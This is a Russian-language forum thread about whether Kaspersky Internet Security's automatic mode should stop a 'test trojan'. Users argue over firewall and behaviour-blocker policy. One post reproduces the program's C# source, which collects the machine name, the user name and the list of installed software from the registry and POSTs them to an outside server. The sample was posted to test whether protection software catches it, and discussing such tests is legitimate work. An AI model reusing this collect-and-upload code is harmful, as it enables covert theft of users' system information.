Уязвимость файрвола Касперского?

[SLASH_id]

Мда.....

 

 

Да, авторежим. Но если НАПИСАНО что "Запрос действия" то где запрос?

Изменено 24 мая, 2010 пользователем SLASH_id

[Андрей]

Что опасного в этой программе, почему она должна детектироваться? Вы скачали её и запустили целеустремленно на компьютере, к которому у вас есть доступ, а как вы её на моем запустите?

[apq]

Но если НАПИСАНО что "Запрос действия" то где запрос?

это судя по всему работает только в неавторежиме. надо у Данилки переспросить

[AgentMC]

Да, авторежим. Но если НАПИСАНО что "Запрос действия" то где запрос?

Это, блин кто спрашивает?! ГБТ с многолетним стажем или третьеклассник-чайник?! В шоке!

Запросы действия в блонди-моде интерпретируются как "разрешить".

 

 

Песец... прога на C# написана. Код:

Раскрывающийся текст:

private void MainForm_Load(object sender, EventArgs e)
{
   StringBuilder builder = new StringBuilder();
   try
   {
       builder.AppendFormat("<h1>Информация, полученная от проверочного трояна</h1><b>Загружено:</b> {2}<br/><b>Компьютер:</b> {0}<br/><b>Пользователь:</b> {1}<br/><br/><h2>Установленные программы:</h2><blockquote style=\"width: 700px; height: 500px; overflow: scroll\">", Environment.MachineName, Environment.UserName, DateTime.Now.ToString());
       RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall");
       foreach (string str in key.GetSubKeyNames())
       {
           try
           {
               RegistryKey key2 = key.OpenSubKey(str);
               object obj2 = key2.GetValue("DisplayName");
               object obj3 = key2.GetValue("DisplayVersion");
               if ((obj2 != null) && (obj2.ToString().Trim() != ""))
               {
                   string str2 = string.Format("<b>{0}</b> {1}<br/>", obj2.ToString(), (obj3 == null) ? "" : ("(" + obj3.ToString() + ")"));
                   builder.Append(str2);
               }
               key2.Close();
           }
           catch (Exception exception)
           {
               builder.Append(exception.ToString());
           }
       }
       key.Close();
       builder.Append("</blockquote>");
   }
   catch (Exception exception2)
   {
       builder.Append(exception2.ToString());
   }
   try
   {
       string str3 = Guid.NewGuid().ToString("N");
       string str4 = string.Format("session={0}&info={1}", str3, HttpUtility.UrlEncode(builder.ToString()));
       WebRequest request = WebRequest.Create("http://www.goodware.ru/trojan/upload.php");
       request.Method = "POST";
       request.ContentType = "application/x-www-form-urlencoded";
       request.ContentLength = str4.Length;
       StreamWriter writer = new StreamWriter(request.GetRequestStream());
       writer.Write(str4);
       writer.Close();
       using (StreamReader reader = new StreamReader(request.GetResponse().GetResponseStream()))
       {
           reader.ReadToEnd();
           this.UpdateResult(string.Format("http://www.goodware.ru/trojan/check.php?session={0}", str3), "Информация об установленных на Вашем компьютере программах была успешно собрана и беспрепятственно отправлена на наш сайт. Вы можете посмотреть ее по этой ссылке:\n\n{0}\n\nДанная информация будет доступна по этой ссылке в течении суток, затем она удаляется с сайта.");
       }
   }
   catch (Exception exception3)
   {
       this.UpdateResult("http://www.goodware.ru/trojan/", string.Format("Информация об установленных на Вашем компьютере программах была успешно собрана, но при отправке произошла ошибка:\n\n{0}\n\nВозможно, но не обязательно, это связано с успешной работой антивирусной программы или фаервола.\nВы можете свой оставить отзыв по этой ссылке:\n\n{{0}}\n\nНапишите текст ошибки и какой программой для защиты Вы пользуетесь. Возможно, это поможет другим.", exception3.Message));
   }
}

private void UpdateResult(string link, string text)
{
   this._linkUrl = link;
   this.lnkResult.Text = string.Format(text, link);
   this.lnkResult.LinkArea = new LinkArea(this.lnkResult.Text.IndexOf(link), link.Length);
}

private void lnkResult_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e)
{
   Process.Start(this._linkUrl);
}

 

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall - вот где прога шарится до смерти просто. В этой ветке нет личной информации пользователя - только список софта на машине. С чего бы вдруг ПДМу это блочить?

//Хотя BSS по принципу "прога что-то прочитала и просится в сеть" - неплохо было бы прикрутить.

Изменено 24 мая, 2010 пользователем AgentMC

[Umnik]

//Хотя BSS по принципу "прога что-то прочитала и просится в сеть" - неплохо было бы прикрутить.

Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные.

[apq]

Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные.

а чего они должны блочится? разве IM клиенты не имеют цифровых подписей известных ЛК и не значатся в списках известных ЛК приложений?

[пользователь]

а чего они должны блочится? разве IM клиенты не имеют цифровых подписей известных ЛК и не значатся в списках известных ЛК приложений?

Не все. Далеко не все.

Но если не нравится пример с IM клиентами, то могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось.

 

А ведь этот пример идеально повторяет этот "тест".

[apq]

могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось.

 

А ведь этот пример идеально повторяет этот "тест".

KIS выдаст алерт и вы сами разрешите действие программе, это не проблема...

[SLASH_id]

Это, блин кто спрашивает?! ГБТ с многолетним стажем или третьеклассник-чайник?! В шоке!

Запросы действия в блонди-моде интерпретируются как "разрешить".

 

Это понятно)) Возникло предложение к следующей версии продукта, вместо кружочков с вопросами, и подобных типа запрет или наследование отрисовывать кружочек с буковкой "А" если включен авторежим.

А то третьеклассник-чайник посмотрит - ага, стоит запрос и будет возмущаться чего ж не спрашивает. Тем более при установке КИСа не спрашивает режим, а ставит автоматику по дефолту.

[AgentMC]

Возникло предложение

Вроде внимательно смотрел... не нашёл

Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные.

Во втором часу ночи формулировка свелась уже к "если прога из Сл.Огр. читает более 40 ключей реестрав разных ветках, а затем пытается отослать информацию в виде единого ПОСТ-запроса по хттп независимо от порта" -> ...

Но если не нравится пример с IM клиентами, то могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось.

На спецсофт есть админ, который в курсе, что такое интерактив. Изменено 25 мая, 2010 пользователем AgentMC

[Kapral]

Я бы слегка расстроился, если у него не получилось.

А уж как расстроится бухгалтерия когда их инфо-система с последними редакциями указявок от правительства не запустится......

 

На спецсофт есть админ, который в курсе,

На спец-софт - есть не только админ - но и корпоративка

[SeveNth AngeL]

У меня киса тож без б пропускает

[пользователь]

KIS выдаст алерт и вы сами разрешите действие программе, это не проблема...

Это ваше право - настройте соответственно.

Кстати, может вы не знаете, но KIS специально сделан так, чтобы задавать вопросы только в важных случаях. Чтобы у покупателя не вырабатывался рефлекс "разрешить". ИМХО: отправка сведений об оборудовании не может считаться важным.

 

Только не говорите мне, что домушники могут таким образом собирать сведения о компьютерах, чтобы планировать свои кражи - я смеяться буду.

 

На спецсофт есть админ, который в курсе, что такое интерактив.

А если это домашний софт? Например, игра подобно сталкеру, использующая технологию старфорса "резервная копия"?

Изменено 25 мая, 2010 пользователем пользователь

[apq]

Это ваше право - настройте соответственно.

то есть включить интерактивный режим? аиесли я хочу принимать решения только по сетевой активности?

Кстати, может вы не знаете, но KIS специально сделан так, чтобы задавать вопросы только в важных случаях. Чтобы у покупателя не вырабатывался рефлекс "разрешить". ИМХО: отправка сведений об оборудовании не может считаться важным.

заметьте, вы сами пишете что имхо. ваше право так считать. а я например считаю, что любой софт без моего ведома не должен собирать какую либо информацию с моего ПК и передавать ее куда-то?

вот если бы можно было выбирать интерактивный режим по отдельным компонентам защиты, а не в целом по защите. это было бы правильнее

[Kapral]

вот если бы можно было выбирать интерактивный режим по отдельным компонентам защиты, а не в целом по защите. это было бы правильнее

Да без проблем

Включается интерактивный режим - все что на автомат - ставите или разрешить или запретить. А что нужно - Вопр.знак